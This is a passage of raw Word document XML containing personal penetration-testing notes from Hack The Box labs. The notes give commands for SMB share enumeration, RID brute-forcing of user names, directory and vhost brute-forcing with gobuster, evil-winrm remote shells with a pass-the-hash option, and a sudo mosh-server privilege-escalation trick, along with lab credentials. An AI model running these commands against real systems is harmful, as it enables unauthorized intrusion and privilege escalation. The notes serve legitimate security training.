    </w:p>
    <w:p w14:paraId="0209A199" w14:textId="56554949" w:rsidR="00ED1CCC" w:rsidRDefault="00ED1CC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 a language that web developers are using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934F748" w14:textId="4C63059E" w:rsidR="00662F80" w:rsidRDefault="00662F80"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NBNS,DNS,LLMNR – all of them protocol for name resolution </w:t>
      </w:r>
      <w:r w:rsidR="003618C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DHCP – contains hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052626A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F673F"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CA5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147A"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70BB1"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F7715" w14:textId="77777777" w:rsidR="002F7AA6" w:rsidRDefault="002F7AA6" w:rsidP="00AD5A99">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D3095" w14:textId="019D4054" w:rsidR="005E279D" w:rsidRPr="00296C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1CE8420" w14:textId="1701393B" w:rsidR="002F7AA6" w:rsidRPr="00294C81" w:rsidRDefault="002F7AA6" w:rsidP="002F7AA6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF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From HTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593C972" w14:textId="77777777" w:rsidR="000F4B21" w:rsidRDefault="00F663C6" w:rsidP="000F4B2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smbmap -H 10.10.10.10 -u admin – may let you see the names of the share directories, and permissions (smb port need to be opened)</w:t>
      </w:r>
      <w:r w:rsidR="000318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smbmap -H 10.10.10.10 -u Michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’</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share directories and the permissions the user ha</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each directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F586D1" w14:textId="2F3B0C24" w:rsidR="00F663C6" w:rsidRPr="008D7550" w:rsidRDefault="000F4B21" w:rsidP="000F4B2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B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 -L //10.10.11.35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available smb shares on the target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663C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 //10.10.11.35/HR – mey let you see the co</w:t>
      </w:r>
      <w:r w:rsidR="009C55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00F663C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of the shared directory</w:t>
      </w:r>
      <w:r w:rsidR="00765F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it without password)</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smbclient //10.10.11.35/SYSVOL -U michael.wrightson </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assword='Cicada$M6Corpb*@Lp#nZp!8' -c 'recurse; ls' &gt; sysvol_contents.txt</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by the right credentials, command retrieve and save all the files inside the share directory into new text file, which let us use text manipulation easily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E25D49" w14:textId="7904A4F0" w:rsidR="006E6E60" w:rsidRDefault="006E6E60"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Impacket-lookupsid </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="005B62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let you find usernames</w:t>
      </w:r>
      <w:r w:rsidR="000901F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their SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B77687" w14:textId="42E7962C" w:rsidR="00E57366" w:rsidRPr="00E57366" w:rsidRDefault="00ED1F4A" w:rsidP="00C645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Gobuster – </w:t>
      </w:r>
      <w:r w:rsidR="001067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brute force tool to find subdirectories, files, and </w:t>
      </w:r>
      <w:r w:rsidR="00A648B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r w:rsidR="001067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w:t>
      </w:r>
      <w:r w:rsidR="008D68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recommended to use file that contain names for the process (as a file full of common domain names for find domain)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55877" w:rsidRP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gobuster dir -u http://10.129.64.106 -w /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="00FE26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300</w:t>
      </w:r>
      <w:r w:rsid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on a target to find a directory</w:t>
      </w:r>
      <w:r w:rsidR="000F1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this ip, it get wordlist as input and use it to find exist directories</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gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u</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6" w:history="1">
        <w:r w:rsidR="00E57366" w:rsidRPr="00506CE9">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http://thetoppers.htb</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dir - </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1F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targets paths within a domain, looking for directories and files</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vhost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1F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targets potential subdomains or host names under a domain</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to the wordlist</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the URL</w:t>
      </w:r>
      <w:r w:rsidR="00FE26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 specify the amount of tries simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C780A" w14:textId="54C85EF6" w:rsidR="00A43E0A" w:rsidRDefault="00A43E0A" w:rsidP="00E573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WinRM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stands for Windows Remote Management, is a feature of Windows that allows administrators to remotely manage and execute programs on Windows machines over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evil-winrm -i 10.129.136.91 -u administrator -p badminton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23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23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credentials you can connect and run powershell commands</w:t>
      </w:r>
      <w:r w:rsidR="009C2C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 – pass the has</w:t>
      </w:r>
      <w:r w:rsidR="00D92D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BC52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(instead -p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4836D" w14:textId="6D4419B2" w:rsidR="007953FC" w:rsidRDefault="007C7FB7" w:rsidP="007953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Mosh (mobile shell) - </w:t>
      </w:r>
      <w:r w:rsidRPr="007C7FB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a command used to initiate remote sessions, similar to SSH but with features that make it particularly useful in certain scenarios</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SSH, which uses TCP, Mosh operates over UDP</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allows you to roam without needing to re-establish the connection. It keeps the session alive even if your IP address changes, which is not possible with SSH without additional tools or settings</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client and server require the installation of Mosh. It's not included by default on most systems, unlike SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BCF28D" w14:textId="2BA478BB" w:rsidR="007C7FB7" w:rsidRDefault="007C7FB7" w:rsidP="007C7F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7C7FB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--server="sudo /usr/bin/mosh-server" localhost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establish new session with mosh, and if password is not required with sudo, we will get privileged </w:t>
      </w:r>
      <w:r w:rsid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r w:rsidR="006337E7" w:rsidRP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username@remote-host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0D9915" w14:textId="6E22E2AB" w:rsidR="003028A6" w:rsidRPr="00136837" w:rsidRDefault="007C1A63" w:rsidP="007C7F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1A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 smb 10.10.11.35 -u guest -p "" --rid-brute | grep "SidTypeUser"</w:t>
      </w:r>
      <w:r w:rsidR="00302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find usenames by exploiting the smb service</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wear security that even guest can enter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brute force on every ID for find all the users,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by grep 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only user accounts</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3028A6" w:rsidRPr="00136837" w:rsidSect="00E17D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4E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8308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E4B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="647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E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="710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7626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C7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1735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18E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9677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1770812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E"/>
    <w:rsid w:val="000042E7"/>
    <w:rsid w:val="00010244"/>
    <w:rsid w:val="000104DD"/>
    <w:rsid w:val="000120DF"/>
    <w:rsid w:val="000164C5"/>
    <w:rsid w:val="00021236"/>
    <w:rsid w:val="00021B18"/>
    <w:rsid w:val="00024C40"/>
    <w:rsid w:val="00026823"/>
    <w:rsid w:val="000318ED"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00032ED0"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="0008798C"/>
    <w:rsid w:val="000901F3"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000B701D"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000C53C8"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D2058"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="000F1522"/>
    <w:rsid w:val="000F4B21"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00106767"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="001350E9"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="00136B08"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00156435"/>
    <w:rsid w:val="00162FAA"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6792"/>
    <w:rsid w:val="001A6D10"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E3594"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="00213353"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00223FFD"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="002327B6"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00262B9E"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="002735B4"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00295DAD"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002A76A9"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002B6D73"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002E305B"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4142"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="002F7AA6"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="003028A6"/>
    <w:rsid w:val="0030573E"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="00341071"/>
    <w:rsid w:val="00344202"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="00377343"/>
    <w:rsid w:val="00387254"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="00396E02"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003D7F7A"/>
    <w:rsid w:val="003E0CCB"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="003E2099"/>
    <w:rsid w:val="003F1545"/>
    <w:rsid w:val="003F5E38"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="004254A3"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="00475AA5"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="0049380C"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004A630B"/>
    <w:rsid w:val="004B0D4A"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="005324F1"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="00542E0A"/>
    <w:rsid w:val="00543B82"/>
    <w:rsid w:val="00551CAF"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="00576AB2"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="0059269A"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="0059796B"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E3C91"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="005F218B"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="0063375E"/>
    <w:rsid w:val="006337E7"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00645B2C"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="0067255A"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C3CD2"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006E6E60"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00700CB9"/>
    <w:rsid w:val="00702525"/>
    <w:rsid w:val="00715982"/>
    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="007266A6"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="00765F72"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="007804A1"/>
    <w:rsid w:val="00781E38"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007953FC"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C1A63"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007C7FB7"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007D6CBF"/>
    <w:rsid w:val="007E69AC"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00854073"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="00885DB4"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008B628C"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D1842"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008D68B3"/>
    <w:rsid w:val="008D7550"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009125AA"/>
    <w:rsid w:val="009163B0"/>
    <w:rsid w:val="00920AE9"/>
    <w:rsid w:val="009270C0"/>
    <w:rsid w:val="00930780"/>
    <w:rsid w:val="00930AF1"/>
    <w:rsid w:val="00933DDE"/>
    <w:rsid w:val="009364DF"/>
    <w:rsid w:val="00940D3C"/>
    <w:rsid w:val="0094127D"/>
    <w:rsid w:val="00943D30"/>
    <w:rsid w:val="00950D1D"/>
    <w:rsid w:val="00952985"/>
    <w:rsid w:val="0096541F"/>
    <w:rsid w:val="009775E5"/>
    <w:rsid w:val="00980E0E"/>
    <w:rsid w:val="00980E58"/>
    <w:rsid w:val="009813B4"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A1A89"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009A6AD5"/>
    <w:rsid w:val="009B0073"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C2C1D"/>
    <w:rsid w:val="009C3587"/>
    <w:rsid w:val="009C5518"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A03D5B"/>
    <w:rsid w:val="00A04B0D"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A43E0A"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A648B2"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00A90AE7"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD4E61"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00AF237E"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B253FA"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B72511"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B913C4"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BA230E"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BC5257"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BE6D2A"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00BF7C2F"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C03C8E"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C127EF"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C35EE5"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C40746"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C645FC"/>
    <w:rsid w:val="00C66798"/>
    <w:rsid w:val="00C748A1"/>
    <w:rsid w:val="00C81999"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C93EDE"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CB46FF"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF1A63"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D1711E"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D30012"/>
    <w:rsid w:val="00D3008E"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D729F5"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00D92D2A"/>
    <w:rsid w:val="00DB08F6"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DB619F"/>
    <w:rsid w:val="00DC7E7E"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E13C8C"/>
    <w:rsid w:val="00E166C2"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E51A8D"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E57366"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00ED1F4A"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EE44B1"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F05659"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F158CB"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F43B9B"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F55877"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F663C6"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F837AD"/>
    <w:rsid w:val="00F92FAC"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE2654"/>
